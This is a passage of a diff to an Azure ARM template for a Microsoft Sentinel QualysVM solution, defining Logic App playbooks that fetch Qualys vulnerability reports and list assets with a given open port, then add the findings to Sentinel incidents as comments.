"object" + } + }, + "type": "object" + } + } + }, + "Parse_Launch_Scan_Report_Output_JSON": { + "runAfter": { + "Launch_Scan_Report": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Launch_Scan_Report')))", + "schema": { + "properties": { + "SIMPLE_RETURN": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "ITEM_LIST": { + "properties": { + "ITEM": { + "properties": { + "KEY": { + "type": "string" + }, + "VALUE": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "TEXT": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Parse_Report_Status_JSON": { + "runAfter": { + "Get_Report_Status": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Get_Report_Status')))", + "schema": { + "properties": { + "REPORT_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "REPORT_LIST": { + "properties": { + "REPORT": { + "properties": { + "EXPIRATION_DATETIME": { + "type": "string" + }, + "ID": { + "type": "string" + }, + "LAUNCH_DATETIME": { + "type": "string" + }, + "OUTPUT_FORMAT": { + "type": "string" + }, + "SIZE": { + "type": "string" + }, + "STATUS": { + "properties": { + "MESSAGE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "PERCENT": { + "type": "string" + }, + "STATE": { + "type": "string" + } + }, + "type": "object" + }, + "TITLE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "TYPE": { + "type": "string" + }, + "USER_LOGIN": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Set_variable_-_ReportID": { + "runAfter": { + "Parse_Launch_Scan_Report_Output_JSON": 
[ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "ReportID", + "value": "@body('Parse_Launch_Scan_Report_Output_JSON')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + }, + "Set_variable_-_ReportStatus": { + "runAfter": { + "Parse_Report_Status_JSON": [ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "ReportStatus", + "value": "@body('Parse_Report_Status_JSON')?['REPORT_LIST_OUTPUT']?['RESPONSE']?['REPORT_LIST']?['REPORT']?['STATUS']?['STATE']" + } + }, + "Terminate": { + "runAfter": { + "For_each_Alert_in_Incident_get_all_CVEIDs": [ + "Failed" + ] + }, + "type": "Terminate", + "inputs": { + "runError": { + "code": "FAIL", + "message": "Custom Details mapping in Analytical Rule is missing or misconfigured." + }, + "runStatus": "Failed" + } + }, + "Wait_Until_Report_Generation_is_Finished": { + "actions": { + "Delay_for_3_minutes": { + "type": "Wait", + "inputs": { + "interval": { + "count": 3, + "unit": "Minute" + } + } + }, + "Get_Report_Status_Again": { + "runAfter": { + "Delay_for_3_minutes": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "list", + "id": "@int(variables('ReportID'))" + } + } + }, + "Parse_Report_Status_JSON_Again": { + "runAfter": { + "Get_Report_Status_Again": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Get_Report_Status_Again')))", + "schema": { + "properties": { + "REPORT_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "REPORT_LIST": { + "properties": { + "REPORT": { + "properties": { + "EXPIRATION_DATETIME": { + "type": "string" + }, + "ID": { + "type": "string" + }, + "LAUNCH_DATETIME": { + 
"type": "string" + }, + "OUTPUT_FORMAT": { + "type": "string" + }, + "SIZE": { + "type": "string" + }, + "STATUS": { + "properties": { + "MESSAGE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "PERCENT": { + "type": "string" + }, + "STATE": { + "type": "string" + } + }, + "type": "object" + }, + "TITLE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "TYPE": { + "type": "string" + }, + "USER_LOGIN": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Update_variable_-_ReportStatus_": { + "runAfter": { + "Parse_Report_Status_JSON_Again": [ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "ReportStatus", + "value": "@body('Parse_Report_Status_JSON_Again')?['REPORT_LIST_OUTPUT']?['RESPONSE']?['REPORT_LIST']?['REPORT']?['STATUS']?['STATE']" + } + } + }, + "runAfter": { + "Set_variable_-_ReportStatus": [ + "Succeeded" + ] + }, + "expression": "@equals(variables('ReportStatus'), 'Finished')", + "limit": { + "count": 60, + "timeout": "PT3H" + }, + "type": "Until" + } + } + }, + "parameters": { + "$connections": { + "value": { + "QualysCustomConnector": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('QualyscustomconnectorConnectionName'))]", + "connectionName": "[[variables('QualyscustomconnectorConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]" + }, + "azureblob": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('AzureblobConnectionName'))]", + "connectionName": "[[variables('AzureblobConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', 
variables('workspace-location-inline'), '/managedApis/Azureblob')]" + }, + "azuresentinel": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]", + "connectionName": "[[variables('MicrosoftSentinelConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + "connectionProperties": { + "authentication": { + "type": "ManagedServiceIdentity" + } + } + } + } + } + } + }, + "name": "[[parameters('PlaybookName')]", + "type": "Microsoft.Logic/workflows", + "location": "[[variables('workspace-location-inline')]", + "tags": { + "hidden-SentinelTemplateName": "QualysVM-GetAssets-ByCVEID", + "hidden-SentinelTemplateVersion": "1.0", + "hidden-SentinelWorkspaceId": "[[variables('workspaceResourceId')]" + }, + "identity": { + "type": "SystemAssigned" + }, + "apiVersion": "2017-07-01", + "dependsOn": [ + "[[resourceId('Microsoft.Web/connections', variables('QualyscustomconnectorConnectionName'))]", + "[[resourceId('Microsoft.Web/connections', variables('AzureblobConnectionName'))]", + "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]" + ] + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('QualyscustomconnectorConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('QualyscustomconnectorConnectionName')]", + "api": { + "id": "[[variables('_connection-2')]" + } + } + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('AzureblobConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('AzureblobConnectionName')]", + "api": { + "id": "[[variables('_connection-3')]" + }, + 
"parameterValues": { + "accountName": "[[variables('AzureBlobStorageName')]", + "accessKey": "[[listKeys(variables('StorageAccountId'), '2019-04-01').keys[0].value]" + } + } + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('MicrosoftSentinelConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('MicrosoftSentinelConnectionName')]", + "parameterValueType": "Alternative", + "api": { + "id": "[[variables('_connection-4')]" + } + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2022-01-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('Playbook-', last(split(variables('playbookId3'),'/'))))]", + "properties": { + "parentId": "[variables('playbookId3')]", + "contentId": "[variables('_playbookContentId3')]", + "kind": "Playbook", + "version": "[variables('playbookVersion3')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + }, + "dependencies": { + "criteria": [ + { + "kind": "LogicAppsCustomConnector", + "contentId": "[variables('_QualysCustomConnector')]", + "version": "[variables('playbookVersion1')]" + } + ] + } + } + } + ], + "metadata": { + "title": "QualysVM-GetAssets-ByCVEID", + "description": "When a new sentinel incident is created, this playbook gets triggered and performs the following actions: \n 1. Get CVE IDs from incident. \n 2. Create a Dynamic Search List with CVE IDs as filter criteria. \n 3. Generate the Vulnerability Report based on Dynamic Search List. \n 4. Download the report and store it to a blob storage. 
This report has details about assets which are vulnerable to CVE. \n 5. Add the link of report as a comment to the incident.", + "prerequisites": [ + "1. Prior to the deployment of this playbook, Qualys Logic App Custom Connector needs to be deployed under the same subscription.", + "2. Refer to [Qualys Logic App Custom Connector](../QualysCustomConnector/readme.md) documentation for deployment instructions." + ], + "postDeployment": [ + "None" + ], + "lastUpdateTime": "2022-09-13T22:25:52Z", + "tags": [ + "Qualys", + "Enrichment", + "VM Report" + ], + "releaseNotes": { + "version": "1.0", + "title": "[variables('blanks')]", + "notes": [ + "Initial version" + ] + } + } + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('_playbookContentId3')]", + "contentKind": "Playbook", + "displayName": "QualysVM-GetAssets-ByCVEID", + "contentProductId": "[variables('_playbookcontentProductId3')]", + "id": "[variables('_playbookcontentProductId3')]", + "version": "[variables('playbookVersion3')]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('playbookTemplateSpecName4')]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "QualysVM-GetAssets-ByOpenPort Playbook with template version 3.0.0", + "mainTemplate": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('playbookVersion4')]", + "parameters": { + "PlaybookName": { + "defaultValue": "QualysVM-GetAssets-ByOpenPort", + 
"type": "string" + }, + "CustomConnectorName": { + "defaultValue": "QualysCustomConnector", + "type": "string", + "metadata": { + "description": "Name of the logic app connector which performs Qualys actions." + } + } + }, + "variables": { + "QualyscustomconnectorConnectionName": "[[concat('Qualyscustomconnector-', parameters('PlaybookName'))]", + "MicrosoftSentinelConnectionName": "[[concat('MicrosoftSentinel-', parameters('PlaybookName'))]", + "connection-2": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]", + "_connection-2": "[[variables('connection-2')]", + "connection-3": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + "_connection-3": "[[variables('connection-3')]", + "workspace-location-inline": "[concat('[resourceGroup().locatio', 'n]')]", + "workspace-name": "[parameters('workspace')]", + "workspaceResourceId": "[[resourceId('microsoft.OperationalInsights/Workspaces', variables('workspace-name'))]" + }, + "resources": [ + { + "properties": { + "provisioningState": "Succeeded", + "state": "Enabled", + "definition": { + "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "$connections": { + "type": "Object" + } + }, + "triggers": { + "Microsoft_Sentinel_incident": { + "type": "ApiConnectionWebhook", + "inputs": { + "body": { + "callback_url": "@{listCallbackUrl()}" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "path": "/incident-creation" + } + } + }, + "actions": { + "Add_comment_to_incident_(V3)": { + "runAfter": { + "Check_for_Successful_Response": [ + "Succeeded", + "TimedOut", + "Skipped", + "Failed" + ], + 
"Check_if_Successful_Response": [ + "Succeeded", + "TimedOut", + "Skipped", + "Failed" + ], + "Terminate": [ + "Skipped" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": { + "incidentArmId": "@triggerBody()?['object']?['id']", + "message": "

@{variables('IncidentCommet')}

" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "method": "post", + "path": "/Incidents/Comment" + } + }, + "Asset_Count_for_Port": { + "runAfter": { + "For_each_Alert_in_Incident_get_all_Ports": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": "\n \n @{first(variables('Ports'))}\n \n", + "headers": { + "Accept": "application/json", + "Content-Type": "text/xml", + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/qps/rest/2.0/count/am/hostasset" + } + }, + "Check_for_Successful_Response": { + "actions": { + "Append_to_IncidentComment": { + "runAfter": { + "Compose_Incident_Comment_with_Count_Details": [ + "Succeeded" + ] + }, + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentCommet", + "value": "@{outputs('Compose_Incident_Comment_with_Count_Details')}\n" + } + }, + "Compose_Incident_Comment_with_Count_Details": { + "type": "Compose", + "inputs": "Total Hosts Count with Open Port @{join(variables('Ports'), ',')}: @{body('Parse_Asset_Count_JSON')?['ServiceResponse']?['count']}\n" + } + }, + "runAfter": { + "Parse_Asset_Count_JSON": [ + "Succeeded" + ] + }, + "else": { + "actions": { + "Append_Asset_Count_Failure_msg_to_Incident_Comment": { + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentCommet", + "value": "Asset Count Qualys API call failed.\n @{slice(string(body('Parse_Asset_Count_JSON')), 0, 1000)}\n" + } + } + } + }, + "expression": { + "and": [ + { + "equals": [ + "@body('Parse_Asset_Count_JSON')?['ServiceResponse']?['responseCode']", + "SUCCESS" + ] + } + ] + }, + "type": "If" + }, + "Check_if_Successful_Response": { + "actions": { + "Append_to_Incident_Comment": { + "runAfter": { + "Create_HTML_table": [ + "Succeeded" + ] + }, + "type": "AppendToStringVariable", + "inputs": { + "name": 
"IncidentCommet", + "value": "Result is limited to @{variables('ResultLimit')} devices (Incident comment has limitation of 30000 characters): \n@{body('Create_HTML_table')}" + } + }, + "Create_HTML_table": { + "runAfter": { + "For_each_Host_in_result": [ + "Succeeded" + ] + }, + "type": "Table", + "inputs": { + "format": "HTML", + "from": "@variables('OutputArray')" + } + }, + "For_each_Host_in_result": { + "foreach": "@body('Parse_Search_Result_JSON')?['ServiceResponse']?['data']", + "actions": { + "Append_to_Output_Array": { + "runAfter": { + "Compose_Result": [ + "Succeeded" + ] + }, + "type": "AppendToArrayVariable", + "inputs": { + "name": "OutputArray", + "value": "@outputs('Compose_Result')" + } + }, + "Compose_Result": { + "runAfter": { + "For_each_Open_Port": [ + "Succeeded" + ] + }, + "type": "Compose", + "inputs": { + "FQDN": "@items('For_each_Host_in_result')?['HostAsset']?['fqdn']", + "Hostname": "@items('For_each_Host_in_result')?['HostAsset']?['netbiosName']", + "IPAddress": "@items('For_each_Host_in_result')?['HostAsset']?['address']", + "OS": "@items('For_each_Host_in_result')?['HostAsset']?['os']", + "OpenPorts": "@join(variables('OpenPorts'), ',')" + } + }, + "For_each_Open_Port": { + "foreach": "@items('For_each_Host_in_result')?['HostAsset']?['openPort']?['list']", + "actions": { + "Append_to_array_variable": { + "runAfter": { + "Parse_Open_Port_List_JSON": [ + "Succeeded" + ] + }, + "type": "AppendToArrayVariable", + "inputs": { + "name": "OpenPorts", + "value": "@body('Parse_Open_Port_List_JSON')?['port']" + } + }, + "Parse_Open_Port_List_JSON": { + "type": "ParseJson", + "inputs": { + "content": "@items('For_each_Open_Port')?['HostAssetOpenPort']", + "schema": { + "properties": { + "port": { + "type": "integer" + }, + "protocol": { + "type": "string" + }, + "serviceId": { + "type": "integer" + }, + "serviceName": { + "type": "string" + } + }, + "type": "object" + } + } + } + }, + "type": "Foreach" + }, + "Reset_Variable_OpenPorts": { + 
"runAfter": { + "Append_to_Output_Array": [ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "OpenPorts", + "value": "[variables('TemplateEmptyArray')]" + } + } + }, + "type": "Foreach", + "runtimeConfiguration": { + "concurrency": { + "repetitions": 1 + } + } + } + }, + "runAfter": { + "Parse_Search_Result_JSON": [ + "Succeeded" + ] + }, + "else": { + "actions": { + "Append_Asset_Search_Failure_msg_to_Incident_Comment": { + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentCommet", + "value": "Asset Search Qualys API call failed.\n@{slice(string(body('Parse_Search_Result_JSON')), 0, 1000)}\n" + } + } + } + }, + "expression": { + "and": [ + { + "equals": [ + "@body('Parse_Search_Result_JSON')?['ServiceResponse']?['responseCode']", + "SUCCESS" + ] + } + ] + }, + "type": "If" + }, + "For_each_Alert_in_Incident_get_all_Ports": { + "foreach": "@triggerBody()?['object']?['properties']?['Alerts']", + "actions": { + "For_each_Port": { + "foreach": "@body('Parse_Cutom_Details_Section')?['NetworkPort']", + "actions": { + "Append_to_array_Ports": { + "type": "AppendToArrayVariable", + "inputs": { + "name": "Ports", + "value": "@items('For_each_Port')" + } + } + }, + "runAfter": { + "Parse_Cutom_Details_Section": [ + "Succeeded" + ] + }, + "type": "Foreach" + }, + "Parse_Additional_Data_Section": { + "type": "ParseJson", + "inputs": { + "content": "@items('For_each_Alert_in_Incident_get_all_Ports')?['properties']?['additionalData']", + "schema": { + "properties": { + "Alert generation status": { + "type": "string" + }, + "AlertMessageEnqueueTime": { + "type": "string" + }, + "Analytic Rule Ids": { + "type": "string" + }, + "Analytic Rule Name": { + "type": "string" + }, + "Correlation Id": { + "type": "string" + }, + "Custom Details": { + "type": [ + "string", + "null" + ] + }, + "Data Sources": { + "type": "string" + }, + "Event Grouping": { + "type": "string" + }, + "ProcessedBySentinel": { + "type": "string" + }, + "Query": { + 
"type": "string" + }, + "Query End Time UTC": { + "type": "string" + }, + "Query Period": { + "type": "string" + }, + "Query Start Time UTC": { + "type": "string" + }, + "Search Query Results Overall Count": { + "type": "string" + }, + "Trigger Operator": { + "type": "string" + }, + "Trigger Threshold": { + "type": "string" + } + }, + "type": "object" + } + } + }, + "Parse_Cutom_Details_Section": { + "runAfter": { + "Parse_Additional_Data_Section": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@body('Parse_Additional_Data_Section')?['Custom Details']", + "schema": { + "properties": { + "NetworkPort": { + "items": { + "type": "string" + }, + "type": "array" + } + }, + "type": "object" + } + } + } + }, + "runAfter": { + "Initialize_variable_-_ResultLimit": [ + "Succeeded" + ] + }, + "type": "Foreach" + }, + "Initialize_variable_-_IncidentComment": { + "runAfter": { + "Initialize_variable_-_Ports": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "IncidentCommet", + "type": "string" + } + ] + } + }, + "Initialize_variable_-_OpenPorts": { + "runAfter": { + "Initialize_variable_-_OutputArray": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "OpenPorts", + "type": "array" + } + ] + } + }, + "Initialize_variable_-_OutputArray": { + "runAfter": { + "Initialize_variable_-_IncidentComment": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "OutputArray", + "type": "array" + } + ] + } + }, + "Initialize_variable_-_Ports": { + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "Ports", + "type": "array" + } + ] + } + }, + "Initialize_variable_-_ResultLimit": { + "runAfter": { + "Initialize_variable_-_OpenPorts": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "ResultLimit", + "type": "string", + "value": "50" + } + 
] + } + }, + "Parse_Asset_Count_JSON": { + "runAfter": { + "Asset_Count_for_Port": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@body('Asset_Count_for_Port')", + "schema": { + "properties": { + "ServiceResponse": { + "properties": { + "count": { + "type": "integer" + }, + "responseCode": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Parse_Search_Result_JSON": { + "runAfter": { + "Search_Asset_By_Port": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@body('Search_Asset_By_Port')", + "schema": { + "properties": { + "ServiceResponse": { + "properties": { + "count": { + "type": "integer" + }, + "data": { + "items": { + "properties": { + "HostAsset": { + "properties": { + "address": { + "type": "string" + }, + "biosDescription": { + "type": "string" + }, + "created": { + "type": "string" + }, + "dnsHostName": { + "type": "string" + }, + "fqdn": { + "type": "string" + }, + "id": { + "type": "integer" + }, + "isDockerHost": { + "type": "string" + }, + "lastSystemBoot": { + "type": "string" + }, + "lastVulnScan": { + "type": "string" + }, + "manufacturer": { + "type": "string" + }, + "model": { + "type": "string" + }, + "modified": { + "type": "string" + }, + "name": { + "type": "string" + }, + "netbiosName": { + "type": "string" + }, + "networkGuid": { + "type": "string" + }, + "networkInterface": { + "properties": { + "list": { + "items": { + "properties": { + "HostAssetInterface": { + "properties": { + "address": { + "type": "string" + }, + "hostname": { + "type": "string" + }, + "macAddress": { + "type": "string" + } + }, + "type": "object" + } + }, + "required": [ + "HostAssetInterface" + ], + "type": "object" + }, + "type": "array" + } + }, + "type": "object" + }, + "openPort": { + "properties": { + "list": { + "items": { + "properties": { + "HostAssetOpenPort": { + "properties": { + "port": { + "type": "integer" + }, + "protocol": { + "type": "string" + } + }, 
+ "type": "object" + } + }, + "required": [ + "HostAssetOpenPort" + ], + "type": "object" + }, + "type": "array" + } + }, + "type": "object" + }, + "os": { + "type": "string" + }, + "processor": { + "properties": { + "list": { + "items": { + "properties": { + "HostAssetProcessor": { + "properties": { + "name": { + "type": "string" + } + }, + "type": "object" + } + }, + "required": [ + "HostAssetProcessor" + ], + "type": "object" + }, + "type": "array" + } + }, + "type": "object" + }, + "qwebHostId": { + "type": "integer" + }, + "software": { + "properties": { + "list": { + "items": { + "properties": { + "HostAssetSoftware": { + "properties": { + "name": { + "type": "string" + }, + "version": { + "type": "string" + } + }, + "type": "object" + } + }, + "required": [ + "HostAssetSoftware" + ], + "type": "object" + }, + "type": "array" + } + }, + "type": "object" + }, + "trackingMethod": { + "type": "string" + }, + "type": { + "type": "string" + }, + "vuln": { + "properties": { + "list": { + "items": { + "properties": { + "HostAssetVuln": { + "properties": { + "firstFound": { + "type": "string" + }, + "hostInstanceVulnId": { + "type": "integer" + }, + "lastFound": { + "type": "string" + }, + "qid": { + "type": "integer" + } + }, + "type": "object" + } + }, + "required": [ + "HostAssetVuln" + ], + "type": "object" + }, + "type": "array" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "required": [ + "HostAsset" + ], + "type": "object" + }, + "type": "array" + }, + "hasMoreRecords": { + "type": "string" + }, + "lastId": { + "type": "integer" + }, + "responseCode": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Search_Asset_By_Port": { + "runAfter": { + "For_each_Alert_in_Incident_get_all_Ports": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": "\n\t\n\t\t@{variables('ResultLimit')}\n\t\n \n @{first(variables('Ports'))}\n \n", + "headers": { + "Accept": "application/json", + 
"Content-Type": "text/xml", + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/qps/rest/2.0/search/am/hostasset" + } + }, + "Terminate": { + "runAfter": { + "For_each_Alert_in_Incident_get_all_Ports": [ + "Failed" + ] + }, + "type": "Terminate", + "inputs": { + "runError": { + "code": "FAIL", + "message": "Custom Details mapping in Analytical Rule is missing or misconfigured." + }, + "runStatus": "Failed" + } + } + } + }, + "parameters": { + "$connections": { + "value": { + "QualysCustomConnector": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('QualyscustomconnectorConnectionName'))]", + "connectionName": "[[variables('QualyscustomconnectorConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]" + }, + "azuresentinel": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]", + "connectionName": "[[variables('MicrosoftSentinelConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + "connectionProperties": { + "authentication": { + "type": "ManagedServiceIdentity" + } + } + } + } + } + } + }, + "name": "[[parameters('PlaybookName')]", + "type": "Microsoft.Logic/workflows", + "location": "[[variables('workspace-location-inline')]", + "tags": { + "hidden-SentinelTemplateName": "QualysVM-GetAssets-ByOpenPort", + "hidden-SentinelTemplateVersion": "1.0", + "hidden-SentinelWorkspaceId": "[[variables('workspaceResourceId')]" + }, + "identity": { + "type": "SystemAssigned" + }, + "apiVersion": "2017-07-01", + "dependsOn": [ + "[[resourceId('Microsoft.Web/connections', 
variables('QualyscustomconnectorConnectionName'))]", + "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]" + ] + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('QualyscustomconnectorConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('QualyscustomconnectorConnectionName')]", + "api": { + "id": "[[variables('_connection-2')]" + } + } + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('MicrosoftSentinelConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('MicrosoftSentinelConnectionName')]", + "parameterValueType": "Alternative", + "api": { + "id": "[[variables('_connection-3')]" + } + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2022-01-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('Playbook-', last(split(variables('playbookId4'),'/'))))]", + "properties": { + "parentId": "[variables('playbookId4')]", + "contentId": "[variables('_playbookContentId4')]", + "kind": "Playbook", + "version": "[variables('playbookVersion4')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + }, + "dependencies": { + "criteria": [ + { + "kind": "LogicAppsCustomConnector", + "contentId": "[variables('_QualysCustomConnector')]", + "version": "[variables('playbookVersion1')]" + } + ] + } + } + } + ], + "metadata": { + "title": "QualysVM-GetAssets-ByOpenPort", + "description": "When a new 
sentinel incident is created, this playbook gets triggered and performs the following actions: \n 1. Gets Port from incident. (Only one port) \n 2. Search the Qualys platform and get the asset count with open port. \n 3. Search the Qualys platform and get the asset details as well. (Asset details limited to 50 assets, since incident comment has limitaion of 30000 characters.) \n 4. Combine both the results. \n 5. Add the info as comment to the incident.", + "prerequisites": [ + "1. Prior to the deployment of this playbook, Qualys Logic App Custom Connector needs to be deployed under the same subscription.", + "2. Refer to [Qualys Logic App Custom Connector](../QualysCustomConnector/readme.md) documentation for deployment instructions." + ], + "postDeployment": [ + "None" + ], + "lastUpdateTime": "2022-09-13T22:25:52Z", + "tags": [ + "Qualys", + "Enrichment", + "VM Report" + ], + "releaseNotes": { + "version": "1.0", + "title": "[variables('blanks')]", + "notes": [ + "Initial version" + ] + } + } + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('_playbookContentId4')]", + "contentKind": "Playbook", + "displayName": "QualysVM-GetAssets-ByOpenPort", + "contentProductId": "[variables('_playbookcontentProductId4')]", + "id": "[variables('_playbookcontentProductId4')]", + "version": "[variables('playbookVersion4')]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('playbookTemplateSpecName5')]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + 
